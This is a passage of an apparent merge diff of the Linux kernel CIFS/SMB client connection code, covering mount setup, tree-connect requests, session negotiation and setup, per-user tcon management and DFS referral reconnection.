++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	kfree(cifs_sb->prepath);
++	cifs_sb->prepath = ctx->prepath;
++	ctx->prepath = NULL;
++	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
++
++out:
++	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
++	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
++	if (rc)
++		goto error;
++
++	free_xid(mnt_ctx.xid);
++	return rc;
++
++error:
++	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
++	kfree(mnt_ctx.origin_fullpath);
++	kfree(mnt_ctx.leaf_fullpath);
++	mount_put_conns(&mnt_ctx);
++	return rc;
++}
++#else
++int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	int rc = 0;
++	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
++
++	rc = mount_get_conns(&mnt_ctx);
++	if (rc)
++		goto error;
++
++	if (mnt_ctx.tcon) {
++		rc = is_path_remote(&mnt_ctx);
++		if (rc == -EREMOTE)
++			rc = -EOPNOTSUPP;
++		if (rc)
++			goto error;
++	}
++
++	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
++	if (rc)
++		goto error;
++
++	free_xid(mnt_ctx.xid);
++	return rc;
++
++error:
++	mount_put_conns(&mnt_ctx);
++	return rc;
++}
++#endif
++
++/*
++ * Issue a TREE_CONNECT request.
++ */
++int
++CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
++	 const char *tree, struct cifs_tcon *tcon,
++	 const struct nls_table *nls_codepage)
++{
++	struct smb_hdr *smb_buffer;
++	struct smb_hdr *smb_buffer_response;
++	TCONX_REQ *pSMB;
++	TCONX_RSP *pSMBr;
++	unsigned char *bcc_ptr;
++	int rc = 0;
++	int length;
++	__u16 bytes_left, count;
++
++	if (ses == NULL)
++		return -EIO;
++
++	smb_buffer = cifs_buf_get();
++	if (smb_buffer == NULL)
++		return -ENOMEM;
++
++	smb_buffer_response = smb_buffer;
++
++	header_assemble(smb_buffer, SMB_COM_TREE_CONNECT_ANDX,
++			NULL /*no tid */ , 4 /*wct */ );
++
++	smb_buffer->Mid = get_next_mid(ses->server);
++	smb_buffer->Uid = ses->Suid;
++	pSMB = (TCONX_REQ *) smb_buffer;
++	pSMBr = (TCONX_RSP *) smb_buffer_response;
++
++	pSMB->AndXCommand = 0xFF;
++	pSMB->Flags = cpu_to_le16(TCON_EXTENDED_SECINFO);
++	bcc_ptr = &pSMB->Password[0];
++
++	pSMB->PasswordLength = cpu_to_le16(1);	/* minimum */
++	*bcc_ptr = 0; /* password is null byte */
++	bcc_ptr++;              /* skip password */
++	/* already aligned so no need to do it below */
++
++	if (ses->server->sign)
++		smb_buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	if (ses->capabilities & CAP_STATUS32) {
++		smb_buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++	}
++	if (ses->capabilities & CAP_DFS) {
++		smb_buffer->Flags2 |= SMBFLG2_DFS;
++	}
++	if (ses->capabilities & CAP_UNICODE) {
++		smb_buffer->Flags2 |= SMBFLG2_UNICODE;
++		length =
++		    cifs_strtoUTF16((__le16 *) bcc_ptr, tree,
++			6 /* max utf8 char length in bytes */ *
++			(/* server len*/ + 256 /* share len */), nls_codepage);
++		bcc_ptr += 2 * length;	/* convert num 16 bit words to bytes */
++		bcc_ptr += 2;	/* skip trailing null */
++	} else {		/* ASCII */
++		strcpy(bcc_ptr, tree);
++		bcc_ptr += strlen(tree) + 1;
++	}
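++	/* "?????" is the wildcard service type, letting the server choose */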
++	strcpy(bcc_ptr, "?????");
++	bcc_ptr += strlen("?????");
++	bcc_ptr += 1;
++	count = bcc_ptr - &pSMB->Password[0];
++	be32_add_cpu(&pSMB->hdr.smb_buf_length, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, ses, smb_buffer, smb_buffer_response, &length,
++			 0);
++
++	/* above now done in SendReceive */
++	if (rc == 0) {
++		bool is_unicode;
++
++		tcon->tid = smb_buffer_response->Tid;
++		bcc_ptr = pByteArea(smb_buffer_response);
++		bytes_left = get_bcc(smb_buffer_response);
++		length = strnlen(bcc_ptr, bytes_left - 2);
++		if (smb_buffer->Flags2 & SMBFLG2_UNICODE)
++			is_unicode = true;
++		else
++			is_unicode = false;
++
++		/* skip service field (NB: this field is always ASCII) */
++		if (length == 3) {
++			if ((bcc_ptr[0] == 'I') && (bcc_ptr[1] == 'P') &&
++			    (bcc_ptr[2] == 'C')) {
++				cifs_dbg(FYI, "IPC connection\n");
++				tcon->ipc = true;
++				tcon->pipe = true;
++			}
++		} else if (length == 2) {
++			if ((bcc_ptr[0] == 'A') && (bcc_ptr[1] == ':')) {
++				/* the most common case */
++				cifs_dbg(FYI, "disk share connection\n");
++			}
++		}
++		bcc_ptr += length + 1;
++		bytes_left -= (length + 1);
++		strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
++
++		/* mostly informational -- no need to fail on error here */
++		kfree(tcon->nativeFileSystem);
++		tcon->nativeFileSystem = cifs_strndup_from_utf16(bcc_ptr,
++						      bytes_left, is_unicode,
++						      nls_codepage);
++
++		cifs_dbg(FYI, "nativeFileSystem=%s\n", tcon->nativeFileSystem);
++
++		if ((smb_buffer_response->WordCount == 3) ||
++			 (smb_buffer_response->WordCount == 7))
++			/* field is in same location */
++			tcon->Flags = le16_to_cpu(pSMBr->OptionalSupport);
++		else
++			tcon->Flags = 0;
++		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
++	}
++
++	cifs_buf_release(smb_buffer);
++	return rc;
++}
++
++static void delayed_free(struct rcu_head *p)
++{
++	struct cifs_sb_info *cifs_sb = container_of(p, struct cifs_sb_info, rcu);
++
++	unload_nls(cifs_sb->local_nls);
++	smb3_cleanup_fs_context(cifs_sb->ctx);
++	kfree(cifs_sb);
++}
++
++void
++cifs_umount(struct cifs_sb_info *cifs_sb)
++{
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct tcon_link *tlink;
++
++	cancel_delayed_work_sync(&cifs_sb->prune_tlinks);
++
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	while ((node = rb_first(root))) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++		cifs_get_tlink(tlink);
++		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++		rb_erase(node, root);
++
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++		cifs_put_tlink(tlink);
++		spin_lock(&cifs_sb->tlink_tree_lock);
++	}
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	kfree(cifs_sb->prepath);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
++#endif
++	call_rcu(&cifs_sb->rcu, delayed_free);
++}
++
++int
++cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
++			struct TCP_Server_Info *server)
++{
++	int rc = 0;
++
++	if (!server->ops->need_neg || !server->ops->negotiate)
++		return -ENOSYS;
++
++	/* only send once per connect */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
++	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++
++	server->tcpStatus = CifsInNegotiate;
++	spin_unlock(&server->srv_lock);
++
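++	/*
++	 * The negotiate state machine: tcpStatus stays CifsInNegotiate for
++	 * the duration of the request and is moved back to CifsGood on
++	 * success or CifsNeedNegotiate on failure, so a racing status change
++	 * (e.g. a reconnect) is detected when we retake srv_lock below.
++	 */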
++	rc = server->ops->negotiate(xid, ses, server);
++	if (rc == 0) {
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsInNegotiate)
++			server->tcpStatus = CifsGood;
++		else
++			rc = -EHOSTDOWN;
++		spin_unlock(&server->srv_lock);
++	} else {
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsInNegotiate)
++			server->tcpStatus = CifsNeedNegotiate;
++		spin_unlock(&server->srv_lock);
++	}
++
++	return rc;
++}
++
++int
++cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   struct nls_table *nls_info)
++{
++	int rc = -ENOSYS;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
++	bool is_binding = false;
++
++	spin_lock(&ses->ses_lock);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
++
++	if (ses->ses_status != SES_GOOD &&
++	    ses->ses_status != SES_NEW &&
++	    ses->ses_status != SES_NEED_RECON) {
++		spin_unlock(&ses->ses_lock);
++		return -EHOSTDOWN;
++	}
++
++	/* only send once per connect */
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		return 0;
++	}
++
++	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	spin_unlock(&ses->chan_lock);
++
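++	/*
++	 * If at least one channel is already established, this setup is a
++	 * session binding (adding another channel) rather than a full session
++	 * setup, so the session status, capabilities and auth key are left
++	 * untouched below.
++	 */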
++	if (!is_binding)
++		ses->ses_status = SES_IN_SETUP;
++	spin_unlock(&ses->ses_lock);
++
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
++	if (!is_binding) {
++		ses->capabilities = server->capabilities;
++		if (!linuxExtEnabled)
++			ses->capabilities &= (~server->vals->cap_unix);
++
++		if (ses->auth_key.response) {
++			cifs_dbg(FYI, "Free previous auth_key.response = %p\n",
++				 ses->auth_key.response);
++			kfree_sensitive(ses->auth_key.response);
++			ses->auth_key.response = NULL;
++			ses->auth_key.len = 0;
++		}
++	}
++
++	cifs_dbg(FYI, "Security Mode: 0x%x Capabilities: 0x%x TimeAdjust: %d\n",
++		 server->sec_mode, server->capabilities, server->timeAdj);
++
++	if (server->ops->sess_setup)
++		rc = server->ops->sess_setup(xid, ses, server, nls_info);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "Send error in SessSetup = %d\n", rc);
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_IN_SETUP)
++			ses->ses_status = SES_NEED_RECON;
++		spin_lock(&ses->chan_lock);
++		cifs_chan_clear_in_reconnect(ses, server);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++	} else {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_IN_SETUP)
++			ses->ses_status = SES_GOOD;
++		spin_lock(&ses->chan_lock);
++		cifs_chan_clear_in_reconnect(ses, server);
++		cifs_chan_clear_need_reconnect(ses, server);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++	}
++
++	return rc;
++}
++
++static int
++cifs_set_vol_auth(struct smb3_fs_context *ctx, struct cifs_ses *ses)
++{
++	ctx->sectype = ses->sectype;
++
++	/* krb5 is special, since we don't need username or pw */
++	if (ctx->sectype == Kerberos)
++		return 0;
++
++	return cifs_set_cifscreds(ctx, ses);
++}
++
++static struct cifs_tcon *
++cifs_construct_tcon(struct cifs_sb_info *cifs_sb, kuid_t fsuid)
++{
++	int rc;
++	struct cifs_tcon *master_tcon = cifs_sb_master_tcon(cifs_sb);
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon = NULL;
++	struct smb3_fs_context *ctx;
++
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
++	if (ctx == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	ctx->local_nls = cifs_sb->local_nls;
++	ctx->linux_uid = fsuid;
++	ctx->cred_uid = fsuid;
++	ctx->UNC = master_tcon->tree_name;
++	ctx->retry = master_tcon->retry;
++	ctx->nocase = master_tcon->nocase;
++	ctx->nohandlecache = master_tcon->nohandlecache;
++	ctx->local_lease = master_tcon->local_lease;
++	ctx->no_lease = master_tcon->no_lease;
++	ctx->resilient = master_tcon->use_resilient;
++	ctx->persistent = master_tcon->use_persistent;
++	ctx->handle_timeout = master_tcon->handle_timeout;
++	ctx->no_linux_ext = !master_tcon->unix_ext;
++	ctx->linux_ext = master_tcon->posix_extensions;
++	ctx->sectype = master_tcon->ses->sectype;
++	ctx->sign = master_tcon->ses->sign;
++	ctx->seal = master_tcon->seal;
++	ctx->witness = master_tcon->use_witness;
++
++	rc = cifs_set_vol_auth(ctx, master_tcon->ses);
++	if (rc) {
++		tcon = ERR_PTR(rc);
++		goto out;
++	}
++
++	/* get a reference for the same TCP session */
++	spin_lock(&cifs_tcp_ses_lock);
++	++master_tcon->ses->server->srv_count;
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	ses = cifs_get_smb_ses(master_tcon->ses->server, ctx);
++	if (IS_ERR(ses)) {
++		tcon = (struct cifs_tcon *)ses;
++		cifs_put_tcp_session(master_tcon->ses->server, 0);
++		goto out;
++	}
++
++	tcon = cifs_get_tcon(ses, ctx);
++	if (IS_ERR(tcon)) {
++		cifs_put_smb_ses(ses);
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(ses))
++		reset_cifs_unix_caps(0, tcon, NULL, ctx);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++out:
++	kfree(ctx->username);
++	kfree_sensitive(ctx->password);
++	kfree(ctx);
++
++	return tcon;
++}
++
++struct cifs_tcon *
++cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb)
++{
++	return tlink_tcon(cifs_sb_master_tlink(cifs_sb));
++}
++
++/* find and return a tlink with given uid */
++static struct tcon_link *
++tlink_rb_search(struct rb_root *root, kuid_t uid)
++{
++	struct rb_node *node = root->rb_node;
++	struct tcon_link *tlink;
++
++	while (node) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++
++		if (uid_gt(tlink->tl_uid, uid))
++			node = node->rb_left;
++		else if (uid_lt(tlink->tl_uid, uid))
++			node = node->rb_right;
++		else
++			return tlink;
++	}
++	return NULL;
++}
++
++/* insert a tcon_link into the tree */
++static void
++tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink)
++{
++	struct rb_node **new = &(root->rb_node), *parent = NULL;
++	struct tcon_link *tlink;
++
++	while (*new) {
++		tlink = rb_entry(*new, struct tcon_link, tl_rbnode);
++		parent = *new;
++
++		if (uid_gt(tlink->tl_uid, new_tlink->tl_uid))
++			new = &((*new)->rb_left);
++		else
++			new = &((*new)->rb_right);
++	}
++
++	rb_link_node(&new_tlink->tl_rbnode, parent, new);
++	rb_insert_color(&new_tlink->tl_rbnode, root);
++}
++
++/*
++ * Find or construct an appropriate tcon given a cifs_sb and the fsuid of the
++ * current task.
++ *
++ * If the superblock doesn't refer to a multiuser mount, then just return
++ * the master tcon for the mount.
++ *
++ * First, search the rbtree for an existing tcon for this fsuid. If one
++ * exists, then check to see if it's pending construction. If it is then wait
++ * for construction to complete. Once it's no longer pending, check to see if
++ * it failed and either return an error or retry construction, depending on
++ * the timeout.
++ *
++ * If one doesn't exist then insert a new tcon_link struct into the tree and
++ * try to construct a new one.
++ */
++struct tcon_link *
++cifs_sb_tlink(struct cifs_sb_info *cifs_sb)
++{
++	int ret;
++	kuid_t fsuid = current_fsuid();
++	struct tcon_link *tlink, *newtlink;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		return cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
++
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
++	if (tlink)
++		cifs_get_tlink(tlink);
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	if (tlink == NULL) {
++		newtlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
++		if (newtlink == NULL)
++			return ERR_PTR(-ENOMEM);
++		newtlink->tl_uid = fsuid;
++		newtlink->tl_tcon = ERR_PTR(-EACCES);
++		set_bit(TCON_LINK_PENDING, &newtlink->tl_flags);
++		set_bit(TCON_LINK_IN_TREE, &newtlink->tl_flags);
++		cifs_get_tlink(newtlink);
++
++		spin_lock(&cifs_sb->tlink_tree_lock);
++		/* was one inserted after previous search? */
++		tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
++		if (tlink) {
++			cifs_get_tlink(tlink);
++			spin_unlock(&cifs_sb->tlink_tree_lock);
++			kfree(newtlink);
++			goto wait_for_construction;
++		}
++		tlink = newtlink;
++		tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++	} else {
++wait_for_construction:
++		ret = wait_on_bit(&tlink->tl_flags, TCON_LINK_PENDING,
++				  TASK_INTERRUPTIBLE);
++		if (ret) {
++			cifs_put_tlink(tlink);
++			return ERR_PTR(-ERESTARTSYS);
++		}
++
++		/* if it's good, return it */
++		if (!IS_ERR(tlink->tl_tcon))
++			return tlink;
++
++		/* return an error if we already tried this recently */
++		if (time_before(jiffies, tlink->tl_time + TLINK_ERROR_EXPIRE)) {
++			cifs_put_tlink(tlink);
++			return ERR_PTR(-EACCES);
++		}
++
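++		/*
++		 * Raced with another task: if the PENDING bit was already set,
++		 * someone else is (re)constructing the tcon, so go back to
++		 * waiting for that attempt to finish.
++		 */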
++		if (test_and_set_bit(TCON_LINK_PENDING, &tlink->tl_flags))
++			goto wait_for_construction;
++	}
++
++	tlink->tl_tcon = cifs_construct_tcon(cifs_sb, fsuid);
++	clear_bit(TCON_LINK_PENDING, &tlink->tl_flags);
++	wake_up_bit(&tlink->tl_flags, TCON_LINK_PENDING);
++
++	if (IS_ERR(tlink->tl_tcon)) {
++		cifs_put_tlink(tlink);
++		return ERR_PTR(-EACCES);
++	}
++
++	return tlink;
++}
++
++/*
++ * Periodic workqueue job that scans a superblock's tlink tree and closes
++ * out idle, unreferenced tcons.
++ */
++static void
++cifs_prune_tlinks(struct work_struct *work)
++{
++	struct cifs_sb_info *cifs_sb = container_of(work, struct cifs_sb_info,
++						    prune_tlinks.work);
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct rb_node *tmp;
++	struct tcon_link *tlink;
++
++	/*
++	 * Because we drop the spinlock in the loop in order to put the tlink,
++	 * it's not guarded against removal of links from the tree. The only
++	 * places that remove entries from the tree are this function and
++	 * umounts. Because this function is non-reentrant and is canceled
++	 * before umount can proceed, this is safe.
++	 */
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	node = rb_first(root);
++	while (node != NULL) {
++		tmp = node;
++		node = rb_next(tmp);
++		tlink = rb_entry(tmp, struct tcon_link, tl_rbnode);
++
++		if (test_bit(TCON_LINK_MASTER, &tlink->tl_flags) ||
++		    atomic_read(&tlink->tl_count) != 0 ||
++		    time_after(tlink->tl_time + TLINK_IDLE_EXPIRE, jiffies))
++			continue;
++
++		cifs_get_tlink(tlink);
++		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++		rb_erase(tmp, root);
++
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++		cifs_put_tlink(tlink);
++		spin_lock(&cifs_sb->tlink_tree_lock);
++	}
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
++				TLINK_IDLE_EXPIRE);
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++/* Update dfs referral path of superblock */
++static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb_info *cifs_sb,
++				  const char *target)
++{
++	int rc = 0;
++	size_t len = strlen(target);
++	char *refpath, *npath;
++
++	if (unlikely(len < 2 || *target != '\\'))
++		return -EINVAL;
++
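++	/*
++	 * Normalize the target into a double-backslash UNC path: copy it
++	 * verbatim if it already starts with two backslashes, otherwise
++	 * prepend one.
++	 */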
++	if (target[1] == '\\') {
++		len += 1;
++		refpath = kmalloc(len, GFP_KERNEL);
++		if (!refpath)
++			return -ENOMEM;
++
++		scnprintf(refpath, len, "%s", target);
++	} else {
++		len += sizeof("\\");
++		refpath = kmalloc(len, GFP_KERNEL);
++		if (!refpath)
++			return -ENOMEM;
++
++		scnprintf(refpath, len, "\\%s", target);
++	}
++
++	npath = dfs_cache_canonical_path(refpath, cifs_sb->local_nls, cifs_remap(cifs_sb));
++	kfree(refpath);
++
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++	} else {
++		mutex_lock(&server->refpath_lock);
++		kfree(server->leaf_fullpath);
++		server->leaf_fullpath = npath;
++		mutex_unlock(&server->refpath_lock);
++		server->current_fullpath = server->leaf_fullpath;
++	}
++	return rc;
++}
++
++static int target_share_matches_server(struct TCP_Server_Info *server, const char *tcp_host,
++				       size_t tcp_host_len, char *share, bool *target_match)
++{
++	int rc = 0;
++	const char *dfs_host;
++	size_t dfs_host_len;
++
++	*target_match = true;
++	extract_unc_hostname(share, &dfs_host, &dfs_host_len);
++
++	/* Check if hostnames or addresses match */
++	if (dfs_host_len != tcp_host_len || strncasecmp(dfs_host, tcp_host, dfs_host_len) != 0) {
++		cifs_dbg(FYI, "%s: %.*s doesn't match %.*s\n", __func__, (int)dfs_host_len,
++			 dfs_host, (int)tcp_host_len, tcp_host);
++		rc = match_target_ip(server, dfs_host, dfs_host_len, target_match);
++		if (rc)
++			cifs_dbg(VFS, "%s: failed to match target ip: %d\n", __func__, rc);
++	}
++	return rc;
++}
++
++static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
++				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
++				     struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	const struct smb_version_operations *ops = server->ops;
++	struct cifs_tcon *ipc = tcon->ses->tcon_ipc;
++	char *share = NULL, *prefix = NULL;
++	const char *tcp_host;
++	size_t tcp_host_len;
++	struct dfs_cache_tgt_iterator *tit;
++	bool target_match;
++
++	extract_unc_hostname(server->hostname, &tcp_host, &tcp_host_len);
++
++	tit = dfs_cache_get_tgt_iterator(tl);
++	if (!tit) {
++		rc = -ENOENT;
++		goto out;
++	}
++
++	/* Try to tree connect to all dfs targets */
++	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
++		const char *target = dfs_cache_get_tgt_name(tit);
++		struct dfs_cache_tgt_list ntl = DFS_CACHE_TGT_LIST_INIT(ntl);
++
++		kfree(share);
++		kfree(prefix);
++		share = prefix = NULL;
++
++		/* Check if share matches with tcp ses */
++		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
++			break;
++		}
++
++		rc = target_share_matches_server(server, tcp_host, tcp_host_len, share,
++						 &target_match);
++		if (rc)
++			break;
++		if (!target_match) {
++			rc = -EHOSTUNREACH;
++			continue;
++		}
++
++		if (ipc->need_reconnect) {
++			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
++			if (rc)
++				break;
++		}
++
++		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
++		if (!islink) {
++			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
++			break;
++		}
++		/*
++		 * If no dfs referrals were returned from link target, then just do a TREE_CONNECT
++		 * to it.  Otherwise, cache the dfs referral and then mark current tcp ses for
++		 * reconnect so either the demultiplex thread or the echo worker will reconnect to
++		 * newly resolved target.
++		 */
++		if (dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls, cifs_remap(cifs_sb), target,
++				   NULL, &ntl)) {
++			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
++			if (rc)
++				continue;
++			rc = dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
++			if (!rc)
++				rc = cifs_update_super_prepath(cifs_sb, prefix);
++		} else {
++			/* Target is another dfs share */
++			rc = update_server_fullpath(server, cifs_sb, target);
++			dfs_cache_free_tgts(tl);
++
++			if (!rc) {
++				rc = -EREMOTE;
++				list_replace_init(&ntl.tl_list, &tl->tl_list);
++			} else
++				dfs_cache_free_tgts(&ntl);
++		}
++		break;
++	}
++
++out:
++	kfree(share);
++	kfree(prefix);
++
++	return rc;
++}
++
++static int tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb, char *tree, bool islink,
++				   struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	int num_links = 0;
++	struct TCP_Server_Info *server = tcon->ses->server;
++
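++	/*
++	 * Chase -EREMOTE referrals up to MAX_NESTED_LINKS times; the comma
++	 * expression primes rc with -ELOOP so that running out of link budget
++	 * is reported as too many levels of nesting.
++	 */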
++	do {
++		rc = __tree_connect_dfs_target(xid, tcon, cifs_sb, tree, islink, tl);
++		if (!rc || rc != -EREMOTE)
++			break;
++	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
++	/*
++	 * If we couldn't tree connect to any targets from last referral path, then retry from
++	 * original referral path.
++	 */
++	if (rc && server->current_fullpath != server->origin_fullpath) {
++		server->current_fullpath = server->origin_fullpath;
++		cifs_signal_cifsd_for_reconnect(server, true);
++	}
++
++	dfs_cache_free_tgts(tl);
++	return rc;
++}
++
++int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
++{
++	int rc;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	const struct smb_version_operations *ops = server->ops;
++	struct super_block *sb = NULL;
++	struct cifs_sb_info *cifs_sb;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	char *tree;
++	struct dfs_info3_param ref = {0};
++
++	/* only send once per connect */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->ses->ses_status != SES_GOOD ||
++	    (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON)) {
++		spin_unlock(&tcon->tc_lock);
++		return 0;
++	}
++	tcon->status = TID_IN_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	tree = kzalloc(MAX_TREE_SIZE, GFP_KERNEL);
++	if (!tree) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	if (tcon->ipc) {
++		scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++		rc = ops->tree_connect(xid, tcon->ses, tree, tcon, nlsc);
++		goto out;
++	}
++
++	sb = cifs_get_tcp_super(server);
++	if (IS_ERR(sb)) {
++		rc = PTR_ERR(sb);
++		cifs_dbg(VFS, "%s: could not find superblock: %d\n", __func__, rc);
++		goto out;
++	}
++
++	cifs_sb = CIFS_SB(sb);
++
++	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
++	if (!server->current_fullpath ||
++	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
++		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
++		goto out;
++	}
++
++	rc = tree_connect_dfs_target(xid, tcon, cifs_sb, tree, ref.server_type == DFS_TYPE_LINK,
++				     &tl);
++	free_dfs_info_param(&ref);
++
++out:
++	kfree(tree);
++	cifs_put_tcp_super(sb);
++
++	if (rc) {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_NEED_TCON;
++		spin_unlock(&tcon->tc_lock);
++	} else {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_GOOD;
++		spin_unlock(&tcon->tc_lock);
++		tcon->need_reconnect = false;
++	}
++
++	return rc;
++}
++#else
++int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
++{
++	int rc;
++	const struct smb_version_operations *ops = tcon->ses->server->ops;
++
++	/* only send once per connect */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->ses->ses_status != SES_GOOD ||
++	    (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON)) {
++		spin_unlock(&tcon->tc_lock);
++		return 0;
++	}
++	tcon->status = TID_IN_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, nlsc);
++	if (rc) {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_NEED_TCON;
++		spin_unlock(&tcon->tc_lock);
++	} else {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_GOOD;
++		tcon->need_reconnect = false;
++		spin_unlock(&tcon->tc_lock);
++	}
++
++	return rc;
++}
++#endif
